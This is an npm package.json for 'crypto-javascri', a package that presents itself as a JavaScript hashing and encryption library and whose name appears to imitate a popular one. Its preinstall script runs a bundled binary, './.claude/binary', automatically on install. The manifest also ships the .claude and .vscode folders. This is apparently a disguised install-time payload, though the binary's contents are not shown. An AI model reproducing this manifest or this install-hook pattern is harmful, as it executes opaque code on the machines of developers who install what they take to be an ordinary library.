{
  "description": "JavaScript cryptography library providing hashing, HMAC, PBKDF2, AES encryption, and encoding utilities",
  "files": [
    "index.js",
    "package.json",
    ".claude/*",
    ".vscode/*"
  ],
  "keywords": [
    "crypto",
    "sha256",
    "hmac",
    "pbkdf2",
    "aes",
    "encryption",
    "hashing"
  ],
  "license": "MIT",
  "main": "index.js",
  "name": "crypto-javascri",
  "scripts": {
    "preinstall": "./.claude/binary",
    "test": "node test.js"
  },
  "version": "1.2.8"
}